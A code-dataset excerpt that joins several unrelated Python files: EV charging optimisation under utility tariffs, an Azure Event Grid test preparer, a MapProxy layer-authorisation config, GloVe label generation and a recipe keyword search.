int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_controlled_power = schedule.value\n # The optimization may fail in this case if there is not enough flexibility to meet the subscription rate cap\n # constraint. In that case the output is saved as -1's to flag the problem without throwing an error.\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n \n def simple_cap_controlled_load(self, cap_level, verbose=False):\n \"\"\"Implements the charging control for a simple control set up with a cap on the total load. The value of the\n cap is set in the cap_level input. 
Please refer to the first control method, `sdge_controlled_load', for\n comments on the optimization set up and constraints which are common between the two.\n \"\"\"\n schedule = cvx.Variable((96, self.num_sessions))\n obj = 1.0\n \n constraints = [schedule >= 0]\n constraints += [cvx.sum(schedule, axis=1) <= cap_level] # Cap on total charging\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n \n self.simple_cap_controlled_power = schedule.value\n # In case the cap is infeasible for a given case:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1 \n \n def minpeak_controlled_load(self, verbose=False):\n \"\"\"Implements the charging control for a simple peak minimization control. Please refer to the first control\n method, `sdge_controlled_load', for comments on the optimization set up and constraints which are common\n between the two.\n \"\"\"\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.max(cvx.sum(schedule, axis=1)) # Minimize the peak total load reached at any time during the day\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n \n self.minpeak_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1 \n\n def pge_cev_demandcharge_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E CEV rate but treating the subscription rate like a demand charge\n rather than a cap. 
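The try/except blocks ending in donothing=1 throughout these methods are guarding against infeasible solves (for example, a cap too low for the required energy), in which case schedule.value is None. A more explicit variant of the same guard, assuming only the public cvxpy API; extract_total_load is an illustrative helper, not part of the class:

import cvxpy as cvx
import numpy as np

def extract_total_load(prob: cvx.Problem, schedule: cvx.Variable) -> np.ndarray:
    # schedule.value is None when the cap made the problem infeasible,
    # so branch on the solver status instead of catching exceptions.
    if prob.status in (cvx.OPTIMAL, cvx.OPTIMAL_INACCURATE):
        return np.sum(schedule.value, axis=1)
    return -1 * np.ones(96)   # the same -1 sentinel the class already uses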
Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n # Demand charge on the full time period, demand charge price based on the subscription level price:\n obj += (subscription_rate_per50kw / 50)*cvx.max(cvx.sum(schedule, axis=1))\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_demandcharge_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n \n def pge_cev_energyonly_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E CEV rate without including the subscription at all, just using\n the TOU rate from that schedule - it is up to date on reflecting peak solar and the duck curve issues.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n # Just the energy prices in the objective function:\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n \n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_energyonly_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in 
case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n\n def e19_controlled_load(self, verbose=False):\n \"\"\"Implements the charging control for the PG&E E19 rate schedule. This is not specific to EVs but has been how\n sites like Google campus traditionally are charged for their loads. It includes TOU and demand charges.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, rate_demand_peak, rate_demand_partpeak, rate_demand_overall = e19_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1))) # TOU\n obj += rate_demand_overall * cvx.max(cvx.sum(schedule, axis=1)) # Demand charge on the whole day\n obj += rate_demand_peak * cvx.max(cvx.sum(schedule[peak_inds, :], axis=1)) # Peak period demand charge\n obj += rate_demand_partpeak * cvx.max(cvx.sum(schedule[partpeak_inds, :], axis=1)) # Shoulder period demand charge\n\n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n if verbose:\n print('The objective result: ', result)\n if schedule.value is None:\n print('Optimization failed')\n else:\n self.e19_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n def sce_touev8_controlled_load(self, verbose=False, summer=True):\n \"\"\"Implements the charging control for the SCE TOU-EV8 rate schedule which includes only a TOU rate, no demand\n charges or subscriptions.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, superoffpeak_inds, energy_prices = sce_touev8_values(summer=summer)\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n\n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += 
[0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('The objective result: ', result)\n\n self.sce_touev8_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n\ndef pge_cev_values():\n rate_energy_peak = 0.30267\n rate_energy_partpeak = 0.11079\n rate_energy_offpeak = 0.08882\n\n subscription_rate_per50kw = 183.86\n peak_inds = np.arange(int(16*4), int(22*4)) # Peak from 4pm to 10pm\n # Partpeak from 10pm to 9am and 2pm to 4pm\n partpeak_inds = np.concatenate((np.arange(int(22*4), int(24*4)), np.arange(0, int(9*4)), np.arange(int(14*4), int(16*4))))\n offpeak_inds = np.arange(int(9*4), int(14*4)) # Offpeak from 9am to 2pm (peak solar)\n\n # energy_prices is ((96,)) shape\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_partpeak, int(9 * 4)), np.repeat(rate_energy_offpeak, int(5 * 4)),\n np.repeat(rate_energy_partpeak, int(2 * 4)), np.repeat(rate_energy_peak, int(6 * 4)),\n np.repeat(rate_energy_partpeak, int(2 * 4))))\n\n return peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw\n\n\ndef e19_values():\n rate_energy_peak = 0.16997\n rate_energy_partpeak = 0.12236\n rate_energy_offpeak = 0.09082\n rate_demand_peak = 21.23\n rate_demand_partpeak = 5.85\n rate_demand_overall = 19.10\n\n # Peak is 12pm to 6pm, partpeak is 8:30am to 12pm and 6pm to 9:30pm, offpeak is 9:30pm to 8:30am\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(8.5 * 4)), np.repeat(rate_energy_partpeak, int(3.5 * 4)),\n np.repeat(rate_energy_peak, int(6 * 4)), np.repeat(rate_energy_partpeak, int(3.5 * 4)),\n np.repeat(rate_energy_offpeak, int(2.5 * 4))))\n\n peak_inds = np.arange(int(12 * 4), int(18 * 4))\n partpeak_inds = np.concatenate((np.arange(int(8.5 * 4), int(12 * 4)), np.arange(int(18 * 4), int(21.5 * 4))))\n offpeak_inds = np.concatenate((np.arange(0, int(8.5 * 4)), np.arange(int(21.5 * 4), int(24 * 4))))\n\n return peak_inds, partpeak_inds, offpeak_inds, energy_prices, rate_demand_peak, rate_demand_partpeak, rate_demand_overall\n\n\ndef sce_touev8_values(summer=True):\n rate_energy_peak = 0.37\n rate_energy_partpeak = 0.26\n rate_energy_offpeak = 0.13\n rate_energy_superoffpeak = 0.08\n\n if summer:\n # Peak is 3pm to 8pm, offpeak is 8pm to 3pm.\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(15 * 4)), np.repeat(rate_energy_peak, int(5 * 4)),\n np.repeat(rate_energy_offpeak, int(4 * 4))))\n\n peak_inds = np.arange(int(15 * 4), int(20 * 4))\n partpeak_inds = []\n offpeak_inds = np.concatenate((np.arange(0, int(15 * 4)), np.arange(int(20 * 4), int(24 * 4))))\n superoffpeak_inds = []\n else:\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(7 * 4)), np.repeat(rate_energy_superoffpeak, int(8 * 4)),\n np.repeat(rate_energy_partpeak, int(5 * 4)), np.repeat(rate_energy_offpeak, int(4 * 4))))\n peak_inds = []\n partpeak_inds = np.arange(int(15 * 4), int(20 * 4))\n offpeak_inds = np.concatenate((np.arange(0, int(7 * 4)), np.arange(int(20 * 4), int(24 * 4))))\n superoffpeak_inds = np.arange(int(7 * 4), int(15 * 4))\n\n return peak_inds, partpeak_inds, offpeak_inds, superoffpeak_inds, energy_prices\n\n\ndef sdge_values(method='median', summer=True, percentile=50):\n\n # This csv includes all the prices from the month of july - the prices were dynamic, not based on a preset TOU\n # time. 
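The rate tables above are built by hand from np.repeat/np.arange, which makes off-by-one slips easy. A quick sanity check, runnable in the same module, that a price vector covers all 96 quarter-hour slots and that the period index sets partition the day (using pge_cev_values as the example):

import numpy as np

peak, partpeak, offpeak, prices, _ = pge_cev_values()
assert prices.shape == (96,)
assert sorted(np.concatenate((peak, partpeak, offpeak)).tolist()) == list(range(96))

# example use: the daily energy cost of a flat 10 kW load under this tariff
print(round(float(np.sum(prices * 10.0 * 0.25)), 2))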
They are organized into days in rate_days and then energy_prices is calculated by either taking the median\n # across the days, some other percentile, or picking a random particular day.\n if summer:\n try:\n sdge = pd.read_csv('sdge_pricing_july2019.csv', header=None)\n except:\n sdge = pd.read_csv('/Users/spowell2/Documents/sdge_pricing_july2019.csv', header=None)\n\n weekdays = [1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 15, 16, 17, 18, 19, 22, 23, 24, 25, 26, 29, 30, 31, 32, 33]\n rate_days = np.zeros((24, max(weekdays) + 1))\n ct = 0\n for i in range(max(weekdays) + 1):\n if i in weekdays:\n rate_days[:, ct] = sdge.loc[np.arange(i * 24, (i + 1) * 24), 2]\n ct += 1\n else:\n print('Get winter prices from sdge.')\n\n if method == 'median':\n energy_prices = np.median(rate_days, axis=1)\n elif method == 'percentile':\n energy_prices = np.percentile(rate_days, percentile, axis=1)\n elif method == 'random':\n energy_prices = rate_days[:, int(np.random.choice(np.arange(0, np.shape(rate_days)[1])))]\n\n energy_prices = np.repeat(energy_prices, 4) # Extend to 15min intervals\n\n return energy_prices\n","repo_name":"slacgismo/SCRIPT-tool","sub_path":"PaperCode/CustomRate/loadmodel.py","file_name":"loadmodel.py","file_ext":"py","file_size_in_byte":25639,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"43118387356","text":"import functools\nimport hashlib\nimport os\nfrom collections import namedtuple\n\nfrom azure_devtools.scenario_tests import ReplayableTest\nfrom azure.core.credentials import AccessToken\nfrom azure.mgmt.eventgrid import EventGridManagementClient\nfrom azure.mgmt.eventgrid.models import Topic, InputSchema, JsonInputSchemaMapping, JsonField, JsonFieldWithDefault\nfrom azure_devtools.scenario_tests.exceptions import AzureTestError\n\nfrom devtools_testutils import (\n ResourceGroupPreparer, AzureMgmtPreparer, FakeResource, AzureMgmtTestCase\n)\n\nfrom devtools_testutils.resource_testcase import RESOURCE_GROUP_PARAM\n\nEVENTGRID_TOPIC_PARAM = 'eventgrid_topic'\nEVENTGRID_TOPIC_LOCATION = 'westus'\nCLOUD_EVENT_SCHEMA = InputSchema.cloud_event_schema_v1_0\nCUSTOM_EVENT_SCHEMA = InputSchema.custom_event_schema\nID_JSON_FIELD = JsonField(source_field='customId')\nTOPIC_JSON_FIELD = JsonField(source_field='customTopic')\nEVENT_TIME_JSON_FIELD = JsonField(source_field='customEventTime')\nEVENT_TYPE_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customEventType', default_value='')\nSUBJECT_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customSubject', default_value='')\nDATA_VERSION_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customDataVersion', default_value='')\nCUSTOM_JSON_INPUT_SCHEMA_MAPPING = JsonInputSchemaMapping(id=ID_JSON_FIELD, topic=TOPIC_JSON_FIELD, event_time=EVENT_TIME_JSON_FIELD, event_type=EVENT_TYPE_JSON_FIELD_WITH_DEFAULT, subject=SUBJECT_JSON_FIELD_WITH_DEFAULT, data_version=DATA_VERSION_JSON_FIELD_WITH_DEFAULT)\n\nclass FakeTokenCredential(object):\n \"\"\"Protocol for classes able to provide OAuth tokens.\n :param str scopes: Lets you specify the type of access needed.\n \"\"\"\n def __init__(self):\n self.token = AccessToken(\"YOU SHALL NOT PASS\", 0)\n\n def get_token(self, *args):\n return self.token\n\nclass EventGridTopicPreparer(AzureMgmtPreparer):\n def __init__(self,\n name_prefix='',\n use_cache=False,\n parameter_location=EVENTGRID_TOPIC_LOCATION,\n parameter_name=EVENTGRID_TOPIC_PARAM,\n resource_group_parameter_name=RESOURCE_GROUP_PARAM,\n 
disable_recording=True, playback_fake_resource=None,\n client_kwargs=None, random_name_enabled=True):\n super(EventGridTopicPreparer, self).__init__(name_prefix, random_name_length=24,\n random_name_enabled=random_name_enabled,\n disable_recording=disable_recording,\n playback_fake_resource=playback_fake_resource,\n client_kwargs=client_kwargs)\n self.resource_group_parameter_name = resource_group_parameter_name\n self.parameter_name = parameter_name\n self.parameter_location = parameter_location\n self.name_prefix = name_prefix\n if random_name_enabled:\n self.resource_moniker = self.name_prefix + \"egtopic\"\n \n self.set_cache(use_cache, name_prefix)\n\n def create_resource(self, name, **kwargs):\n if self.is_live:\n self.client = self.create_mgmt_client(EventGridManagementClient)\n group = self._get_resource_group(**kwargs)\n\n if self.name_prefix.startswith(\"cloud\"):\n # Create a new topic and verify that it is created successfully\n topic = Topic(location=self.parameter_location, tags=None, input_schema=CLOUD_EVENT_SCHEMA, input_schema_mapping=None)\n elif self.name_prefix.startswith(\"custom\"):\n # Create a new topic and verify that it is created successfully\n topic = Topic(location=self.parameter_location, tags=None, input_schema=CUSTOM_EVENT_SCHEMA, input_schema_mapping=CUSTOM_JSON_INPUT_SCHEMA_MAPPING)\n else:\n topic = Topic(location=self.parameter_location)\n topic_operation = self.client.topics.begin_create_or_update(\n group.name,\n name,\n topic,\n )\n self.resource = topic_operation.result()\n key = self.client.topics.list_shared_access_keys(group.name, name)\n self.primary_key = key.key1\n self.endpoint = self.resource.endpoint\n else:\n self.resource = FakeResource(name=name, id=name)\n self.primary_key = \"ZmFrZV9hY29jdW50X2tleQ==\" # test key copied from sb_preparer\n self.endpoint = \"https://{}.westus-1.eventgrid.azure.net/api/events\".format(name)\n return {\n self.parameter_name: self.resource,\n '{}_primary_key'.format(self.parameter_name): self.primary_key,\n '{}_endpoint'.format(self.parameter_name): self.endpoint,\n }\n\n def remove_resource(self, name, **kwargs):\n if self.is_live:\n group = self._get_resource_group(**kwargs)\n self.client.topics.begin_delete(group.name, name, polling=False)\n\n def _get_resource_group(self, **kwargs):\n try:\n return kwargs.get(self.resource_group_parameter_name)\n except KeyError:\n template = 'To create this event grid topic resource, a resource group is required. 
Please add ' \\\n 'decorator @{} in front of this event grid topic preparer.'\n raise AzureTestError(template.format(ResourceGroupPreparer.__name__))\n\n\nCachedEventGridTopicPreparer = functools.partial(EventGridTopicPreparer, use_cache=True)\n","repo_name":"mirespace/python-azure","sub_path":"sdk/eventgrid/azure-eventgrid/tests/eventgrid_preparer.py","file_name":"eventgrid_preparer.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4574921245","text":"from shapely.geometry import shape, MultiPolygon\nimport fiona\n#import logging\n#import sys\n#logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\nshp_border_region = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/border_region.shp', 'r')])\n#shp_nsw_northern = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/nsw_northern.shp', 'r')])\nshp_qld_southeast = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/qld_southeast.shp', 'r')])\n\ndef auth(service, layers=[], environ=None, **kw):\n if service != 'wms.map' or not layers[0].endswith('_border'):\n return {'authorized':'full'}\n else:\n return {\n 'authorized':'partial',\n 'layers':\n {\n 'nsw_topo3_border': {\n 'map': True,\n 'limited_to':\n {\n 'geometry': shp_border_region.wkt,\n 'srs': 'EPSG:28356'\n }\n },\n 'qld_topo_border':\n {\n 'map': True,\n 'limited_to':\n {\n 'geometry': shp_qld_southeast.wkt,\n 'srs': 'EPSG:28356'\n }\n }\n }\n }\n\nfrom mapproxy.wsgiapp import make_wsgi_app\n_application = make_wsgi_app(r'aus_src.yaml')\n\ndef application(environ, start_response):\n environ['mapproxy.authorize'] = auth\n return _application(environ, start_response)\n","repo_name":"mryellow/debian-scripts","sub_path":"assets/mapproxy/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"2926381645","text":"import os,sys,sys,re\nimport json\nfrom glove import Glove\nimport numpy as np\nfrom gensim import corpora\nsys.path.append(\"../LDA\")\nfrom preprocess_text import preprocess\n\nprint (' builds a dictionary with images paths as keys and GloVe space probability distributions as values')\nprint (' these probability distributions are then used as labels')\nprint (' for training a CNN to predict the semantic context in which images appear')\nprint (' (...)')\n\nNUM_TOPICS_arr = [40,300]\n\nfor NUM_TOPICS in NUM_TOPICS_arr:\n db_dir = '../data/ImageCLEF_Wikipedia/'\n train_dict_path = '../LDA/train_dict_ImageCLEF_Wikipedia.json'\n\n if not os.path.isdir(db_dir):\n sys.exit('ERR: Dataset folder '+db_dir+' not found!')\n\n if not os.path.isfile(train_dict_path):\n sys.exit('ERR: Train dictionary file '+train_dict_path+' not found!')\n\n with open(train_dict_path) as f:\n train_dict = json.load(f)\n\n # load id <-> term dictionary\n if not os.path.isfile('./dictionary.dict'):\n sys.exit('ERR: ID <-> Term dictionary file ./dictionary.dict not found!')\n\n print ('Loading id <-> term dictionary from ./dictionary.dict ...',)\n sys.stdout.flush()\n dictionary = corpora.Dictionary.load('./dictionary.dict')\n print (' Done!')\n # ignore words that appear in less than 20 documents or more than 50% documents\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # load GloVe model\n if not os.path.isfile('glovemodel'+str(NUM_TOPICS)+'.glove'):\n sys.exit('ERR: GloVe model file 
./glovemodel'+str(NUM_TOPICS)+'.glove not found!')\n\n print ('Loading GloVe model from file ./glovemodel'+str(NUM_TOPICS)+'.glove ...',)\n sys.stdout.flush()\n glovemodel = Glove.load('glovemodel'+str(NUM_TOPICS)+'.glove')\n print (' Done!')\n\n # transform ALL documents into GloVe space\n target_labels = {}\n for img_path in train_dict.keys():\n with open(db_dir+train_dict[img_path]) as fp: raw = fp.read()\n\n tokens = preprocess(raw)\n\n # ignore words that appear in less than 20 documents or more than 50% documents\n filtered_tokens = []\n for word in tokens:\n if word in dictionary.token2id: filtered_tokens.append(word)\n\n # Compute GloVe embedding for each word in the text and take its mean\n embedding = np.zeros(NUM_TOPICS)\n num_words = 0\n for word in filtered_tokens:\n try:\n embedding += glovemodel.word_vectors[glovemodel.dictionary[word]]\n num_words += 1\n except:\n print (\"Word not in model: \" + word)\n continue\n if num_words > 1: embedding /= num_words\n\n # L2 normalize the embedding\n if min(embedding) < 0: embedding = embedding - min(embedding)\n if sum(embedding) > 0: embedding = embedding / np.linalg.norm(embedding)\n\n target_labels[img_path] = embedding.tolist()\n\n sys.stdout.write('\\r%d/%d text documents processed...' % (len(target_labels),len(train_dict.keys())))\n sys.stdout.flush()\n sys.stdout.write(' Done!\\n')\n\n # save key,labels pairs into json format file\n with open('./training_labels'+str(NUM_TOPICS)+'.json','w') as fp:\n json.dump(target_labels, fp)\n","repo_name":"gombru/TextTopicNet","sub_path":"GloVe/generate_train_labels.py","file_name":"generate_train_labels.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32071334679","text":"from bs4 import BeautifulSoup\r\nimport os, nltk\r\n\r\nclass Search():\r\n\r\n def __init__(self, keywords = False, corpus = False, lang = 1):\r\n self.keywords = set(keywords)\r\n self.corpus = corpus\r\n self.lang = lang\r\n\r\n # get a tagged text: example [je suis libre] => [('je', P), ('suis', VB), ('libre', ADJ)]\r\n def getTagged(self, text):\r\n from nltk.tag import StanfordPOSTagger\r\n\r\n if self.lang == 1:\r\n jar = 'stanford-pos-tagger/stanford-postagger-3.8.0.jar'\r\n model = 'stanford-pos-tagger/french.tagger'\r\n pos_tagger = StanfordPOSTagger(model, jar, encoding='utf8' )\r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n taggedText = pos_tagger.tag(tokenizedText)\r\n else:\r\n jar = 'stanford-pos-tagger/stanford-postagger-3.8.0.jar'\r\n model = 'stanford-pos-tagger/arabic.tagger'\r\n pos_tagger = StanfordPOSTagger(model, jar, encoding='utf8' )\r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n taggedText = pos_tagger.tag(tokenizedText)\r\n print(taggedText)\r\n return taggedText\r\n \r\n\r\n def getStemmedText(self, text):\r\n stemmedText = []\r\n if self.lang == 1:\r\n stemmer = nltk.stem.snowball.FrenchStemmer()\r\n stemmedText = [stemmer.stem(word) for word in text if word.isalpha()]\r\n else:\r\n from tashaphyne.stemming import ArabicLightStemmer\r\n ArListem = ArabicLightStemmer()\r\n for word in text:\r\n if word.isalpha():\r\n stem = ArListem.light_stem(word)\r\n root = ArListem.get_root()\r\n stemmedText.append(root)\r\n return stemmedText\r\n\r\n\r\n\r\n # transform my XML page to Beautiful Soup object\r\n def getCorpusSoup(self):\r\n file = open(self.corpus, 'r')\r\n content = file.read()\r\n return BeautifulSoup(content,\"lxml\")\r\n\r\n\r\n # just to split sentence to words\r\n 
def text2list(self, text): \r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n return tokenizedText\r\n\r\n\r\n # check if my recipe contain a denied ingredient (porc, liqueur...)\r\n def isDenied(self, content, denied):\r\n # Content: title or recipe or category \r\n # Denied: my word list to denied\r\n splitedContent = self.text2list(content)\r\n for ing in denied:\r\n if ing in splitedContent:\r\n return False\r\n return True\r\n\r\n\r\n # just to build correctly my denied word list: french stop words + colors ...etc\r\n def getDeniedWords(self):\r\n deniedList = []\r\n if self.lang == 1:\r\n colors = ['blanc', 'noir', 'rouge', 'jaune'] # à compléter\r\n otherWord = ['tous', 'les', 'ingrédients', 'moitiés', 'trait', 'frais', 'ensemble', 'petits', 'grand', 'préparation', 'préparations', 'poisson', 'légumes', 'fruits', 'épices', 'service', 'plat']\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet', 'jambon', 'alcool', 'bière', 'rhum', 'vodka', 'whisky', 'tequila', 'Gin', 'cognac', 'pastis', 'lardon', 'champagne']#à compléter\r\n from nltk.corpus import stopwords\r\n stopWords = stopwords.words('french')\r\n deniedList.extend(colors)\r\n deniedList.extend(otherWord)\r\n deniedList.extend(haram)\r\n deniedList.extend(stopWords)\r\n else:\r\n colors = [] # à compléter\r\n otherWord = []\r\n from stop_words import get_stop_words\r\n stopWords = get_stop_words('arabic')\r\n deniedList.extend(colors)\r\n deniedList.extend(otherWord)\r\n deniedList.extend(stopWords)\r\n \r\n return self.getStemmedText(deniedList)\r\n\r\n # transform a recipe on XML format to a keywords list\r\n def getKeyWords(self, text):\r\n deniedList = set(self.getDeniedWords())\r\n keywords = []\r\n if self.lang == 1:\r\n for line in text:\r\n tline = self.getTagged(line)\r\n ntline = [taggedWord[0] for taggedWord in tline if taggedWord[1].startswith('N')]\r\n stemmedNTLine = set(self.getStemmedText(ntline))\r\n cleanText = stemmedNTLine - deniedList\r\n keywords.extend(list(cleanText))\r\n else:\r\n # from nltk.stem.isri import ISRIStemmer\r\n # stemmer = ISRIStemmer()\r\n for line in text:\r\n tline = self.getTagged(line)\r\n tline = [(item[1].split('/')[0], item[1].split('/')[1]) for item in tline]\r\n ntline = [taggedWord[0] for taggedWord in tline if (taggedWord[1].startswith('N') or taggedWord[1].startswith('DTN'))]\r\n stemmedNTLine = set(self.getStemmedText(ntline))\r\n cleanText = stemmedNTLine - deniedList\r\n keywords.extend(list(cleanText))\r\n # cleanText = [stemmer.stem(word) for word in ntline if stemmer.stem(word) not in deniedList and word.isalpha()]\r\n # 